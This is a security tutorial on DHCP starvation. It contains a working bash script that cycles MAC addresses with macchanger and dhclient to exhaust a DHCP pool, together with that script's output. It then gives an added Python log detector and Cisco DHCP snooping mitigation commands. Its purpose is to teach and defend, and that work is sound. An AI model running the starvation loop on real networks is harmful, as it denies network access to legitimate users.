Overview
The DHCP starvation attack is quite simple to implement and therefore quite dangerous. It can be used to mount a denial of service attack in the local network, preventing legitimate clients from obtaining an address and thus from accessing network resources. In this article we will demonstrate how this attack can be deployed and later we will go through the steps necessary to mitigate it on Cisco equipment.
Scenario
The idea behind DHCP starvation is to obtain dummy leases for all IPs in the DHCP range. This effectively causes a DoS: every new network client that requests an IP address from the DHCP server is refused, because there are no free addresses left to lease. Depending on the lease time configured on the DHCP server, the effect of the attack lasts until the bogus leases expire (or until the attacker stops renewing them).
This attack can be automatically performed with yersinia, but for demonstration purposes we will use a quick and dirty script that only uses macchanger and dhclient.
macchanger is a great tool that just does what it says in its name – it changes the MAC address of your network interface. dhclient on the other hand is the standard tool present in almost any Linux distribution, which is used for leasing an IP address from a DHCP server, and renewing the lease when necessary.
To the point – the following bash script demonstrates step by step the way such an attack works:
root@bt:~# cat starve.sh
#!/bin/bash
while true; do
    # kill all running dhcp clients - just in case
    killall dhclient
    rm -f /var/run/dhclient.pid
    # bring down the interface
    ifconfig eth0 down
    # change the MAC address of the interface and print the new MAC address
    macchanger -a eth0 2>&1 | grep Faked
    # bring the interface up
    ifconfig eth0 up
    # make a new DHCP lease
    dhclient eth0 2>&1 | grep DHCPACK
done
root@bt:~#
The results from running this script, besides causing a DoS attack (for which you will be personally responsible unless you are authorized to perform penetration testing of the network resources involved), will look much like this:
root@bt:~# ./starve.sh
dhclient: no process killed
Faked MAC: 00:0e:7b:63:fc:18 (Toshiba)
DHCPACK of 192.168.123.207 from 192.168.123.1
Faked MAC: 00:30:63:ec:24:fb (Santera Systems, Inc.)
DHCPACK of 192.168.123.208 from 192.168.123.1
Faked MAC: 00:0b:30:df:69:28 (Beijing Gongye Science & Technology Co.,ltd)
Faked MAC: 00:0d:08:d3:d9:ad (Abovecable, Inc.)
Faked MAC: 00:05:20:49:1f:5a (Smartronix, Inc.)^C
root@bt:~#
When you stop seeing DHCPACKs, the DHCP server has run out of leases to hand out: the pool is depleted.
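Seen from the DHCP server, the same attack shows up as a burst of DHCPACKs to many different client MACs followed by "no free leases". The following Python snippet is an added, defender-side example that is not part of the original article: it parses syslog lines in the style ISC dhcpd emits (the sample lines, MAC addresses and thresholds are constructed for illustration) and flags any sliding window in which more distinct client MACs were acknowledged than real hosts would plausibly join.

```python
import re
from collections import deque
from datetime import datetime

# Constructed sample in ISC dhcpd syslog style: one legitimate lease, then a
# burst of leases to fresh MACs every second until the pool is exhausted.
SAMPLE_LOG = """\
Jun 12 09:58:40 dhcp dhcpd: DHCPACK on 192.168.123.50 to 3c:97:0e:11:22:33 (laptop) via eth0
Jun 12 10:00:01 dhcp dhcpd: DHCPDISCOVER from 00:0e:7b:63:fc:18 via eth0
Jun 12 10:00:01 dhcp dhcpd: DHCPACK on 192.168.123.207 to 00:0e:7b:63:fc:18 via eth0
Jun 12 10:00:02 dhcp dhcpd: DHCPACK on 192.168.123.208 to 00:30:63:ec:24:fb via eth0
Jun 12 10:00:03 dhcp dhcpd: DHCPACK on 192.168.123.209 to 00:0b:30:df:69:28 via eth0
Jun 12 10:00:04 dhcp dhcpd: DHCPACK on 192.168.123.210 to 00:0d:08:d3:d9:ad via eth0
Jun 12 10:00:05 dhcp dhcpd: DHCPACK on 192.168.123.211 to 00:05:20:49:1f:5a via eth0
Jun 12 10:00:06 dhcp dhcpd: DHCPACK on 192.168.123.212 to 00:1a:2b:3c:4d:5e via eth0
Jun 12 10:00:07 dhcp dhcpd: no free leases on subnet 192.168.123.0
""".splitlines()

# Matches "<syslog timestamp> <host> dhcpd[pid]: DHCPACK on <ip> to <mac> ..."
ACK_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+dhcpd(?:\[\d+\])?:\s+"
    r"DHCPACK on (?P<ip>\d+\.\d+\.\d+\.\d+) to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
)

def parse_acks(lines, year=2024):
    """Yield (timestamp, ip, mac) for each DHCPACK line; syslog omits the year."""
    for line in lines:
        m = ACK_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["ip"], m["mac"].lower()

def detect_starvation(lines, window_s=10, max_new_macs=5):
    """Return [(window_start, window_end, distinct_macs)] once per burst in which
    more than max_new_macs distinct clients were ACKed within window_s seconds."""
    alerts, window, alerting = [], deque(), False   # window holds (ts, mac) pairs
    for ts, _ip, mac in parse_acks(lines):
        window.append((ts, mac))
        while (ts - window[0][0]).total_seconds() > window_s:
            window.popleft()                        # slide the window forward
        distinct = len({m for _, m in window})
        if distinct > max_new_macs and not alerting:
            alerts.append((window[0][0], ts, distinct))
            alerting = True                         # report each burst once
        elif distinct <= max_new_macs:
            alerting = False
    return alerts
```

Tune window_s and max_new_macs to the onboarding rate of the segment; a burst that also coincides with "no free leases" lines is the starvation signature, and the offending MACs lead back to the switch port to shut down.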
Mitigation
When IP allocation is done through DHCP servers, DHCP snooping can be configured on the switches. It treats client-facing ports as untrusted (DHCP server messages arriving on them are dropped), builds a binding table of the IP/MAC pairs that were legitimately leased, which can then be used to allow only those clients onto the network, and can rate-limit DHCP traffic per port so that a host requesting leases in a tight loop, as in the script above, gets its port shut down instead of draining the pool.
To configure DHCP snooping on a Cisco IOS switch, enter the following commands:
! To enable DHCP Snooping globally enter:
switch(config)# ip dhcp snooping
! To enable DHCP Snooping for specific VLANs enter (a single VLAN or a range):
switch(config)# ip dhcp snooping vlan <vlan-id>
! On the interface facing the DHCP server (or the uplink towards it), set the trusted state, which allows DHCP replies to pass; leave client-facing ports untrusted:
switch(config-if)# ip dhcp snooping trust
! On untrusted client-facing interfaces, set a rate limit in DHCP packets per second; a port that exceeds the limit is error-disabled:
switch(config-if)# ip dhcp snooping limit rate <pps>